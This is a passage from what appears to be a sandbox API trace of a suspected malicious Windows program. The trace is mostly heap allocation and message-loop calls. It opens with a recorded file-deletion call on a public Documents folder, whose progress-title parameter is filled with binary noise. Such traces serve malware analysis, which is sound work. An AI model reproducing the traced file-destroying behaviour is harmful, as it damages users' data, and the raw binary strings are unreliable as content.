lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.171] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0224.171] TranslateMessage (lpMsg=0x8cf968) returned 0 [0224.172] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0224.172] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0224.172] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.172] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0224.172] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0224.172] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0224.172] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0224.172] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0224.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0224.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0224.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0224.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0224.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0224.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0224.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0224.174] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0224.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0224.175] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0224.175] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0224.175] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0224.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0224.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0224.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0224.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0224.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0224.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 